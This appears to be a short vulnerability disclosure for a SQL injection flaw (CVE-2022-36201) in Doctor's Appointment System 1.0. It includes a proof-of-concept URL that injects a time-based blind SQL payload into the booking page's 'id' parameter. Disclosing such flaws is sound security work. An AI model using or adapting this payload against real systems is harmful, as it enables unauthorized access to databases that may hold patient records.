

Doctor's Appointment System 1.0 SQL Injection

Doctor’s Appointment System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Soham Bakore and Nakul Ratti in February of 2021.

Packet Storm
# Exploit Title: SQLi - Doctor's Appointment System v1.0# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage: Software Link: Version: 1.0# Tested on: Linux# CVE : CVE-2022-36201POC:http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)

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